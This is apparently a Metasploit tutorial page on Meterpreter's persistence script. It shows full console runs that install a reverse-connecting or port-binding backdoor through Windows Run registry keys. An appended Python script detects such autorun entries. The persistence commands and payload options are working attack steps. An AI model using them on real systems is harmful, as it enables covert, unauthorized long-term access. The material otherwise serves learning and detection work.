[MAD-METASPLOIT] 0x34 - Persistence Backdoor

Persistence backdoor

Meterpreter can use the persistence script to leave a backdoor on the system, creating a channel for continued access.

meterpreter > run persistence -h

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value […]
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

-A        Automatically start a matching exploit/multi/handler to connect to the agent
-L <opt>  Location in target host to write payload to, if none %TEMP% will be used.
-P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
-S        Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt>  Alternate executable template to use
-U        Automatically start the agent when the User logs on
-X        Automatically start the agent when the system boots
-h        This help menu
-i <opt>  The interval in seconds between each connection attempt
-p <opt>  The port on which the system running Metasploit is listening
-r <opt>  The IP of the system running Metasploit listening for the connect back

Depending on the option, the agent can be set to start at boot, at logon, and so on.

Creating a backdoor that makes a reverse connection when the user logs on

meterpreter > run persistence -U -i 5 -p 22 -r 192.168.56.101

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value […]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/HAHWUL_20170807.5914/HAHWUL_20170807.5914.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=22
[*] Persistent agent script is 99642 bytes long
[+] Persistent Script written to C:\Users\SILENC~1\AppData\Local\Temp\vnJKNtOW.vbs
[*] Executing script C:\Users\SILENC~1\AppData\Local\Temp\vnJKNtOW.vbs
[+] Agent executed with PID 8068
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ljAYMQEIrbRBJb
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ljAYMQEIrbRBJb

Creating a backdoor that binds port 22 as soon as the system boots

meterpreter > run persistence -X -i 5 -p 22 -r 192.168.56.101 -P windows/meterpreter/bind_tcp

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value […]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/HAHWUL_20170807.0044/HAHWUL_20170807.0044.rc
[*] Creating Payload=windows/meterpreter/bind_tcp LHOST=192.168.56.101 LPORT=22
[*] Persistent agent script is 99692 bytes long
[+] Persistent Script written to C:\Users\SILENC~1\AppData\Local\Temp\QCaMHq.vbs
[*] Executing script C:\Users\SILENC~1\AppData\Local\Temp\QCaMHq.vbs
[+] Agent executed with PID 1592
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\gOuJoRmXcHbUao
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\gOuJoRmXcHbUao
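Both runs above end by writing an autorun value under a Run key that points at a .vbs script dropped in the user's temp directory. The following is an added defender-side example, not part of the original post and not Metasploit's own code: it parses `reg query` output for a Run key (a constructed sample that reuses the value name and script path from the first run, next to a benign entry) and flags entries that launch a script from a temp directory or carry a random-looking name.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample of `reg query HKCU\...\Run` output: one benign entry plus the
# autorun value the persistence run above installed (name and path from the page).
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive          REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    ljAYMQEIrbRBJb    REG_SZ    C:\Users\SILENC~1\AppData\Local\Temp\vnJKNtOW.vbs
"""

TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\", "%temp%")
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".ps1", ".bat", ".cmd"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
_VALUE_RE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s+(.*\S)\s*$")

def parse_reg_query(text):
    """Yield (key, value_name, data) for every value line under a HKEY_... header."""
    key = None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
        elif key and (m := _VALUE_RE.match(line)):
            yield key, m.group(1), m.group(3)

def command_path(data):
    """Return the executable/script path at the start of a Run value's command line."""
    if data.startswith('"'):
        return data[1:data.find('"', 1)]
    return data.split()[0]

def suspicious_run_entries(text):
    """Flag Run entries that look like the persistence script's autorun value."""
    findings = []
    for key, name, data in parse_reg_query(text):
        path = PureWindowsPath(command_path(data))
        lowered = str(path).lower()
        reasons = []
        if any(t in lowered for t in TEMP_DIRS):
            reasons.append("launches from a temp directory")
        if path.suffix.lower() in SCRIPT_EXTS or path.name.lower() in SCRIPT_HOSTS:
            reasons.append("runs a script or script host")
        # Weak signal: randomly generated alpha names tend to have many interior capitals.
        if name.isalpha() and sum(c.isupper() for c in name[1:]) >= 4:
            reasons.append("random-looking value name")
        if reasons:
            findings.append({"key": key, "name": name, "data": data, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in suspicious_run_entries(SAMPLE_REG_QUERY):
        print(f"{f['key']}\\{f['name']}: {f['data']} -> {', '.join(f['reasons'])}")
```

Run the same check against HKLM\...\Run to cover the -X variant, which installs under the machine-wide key instead.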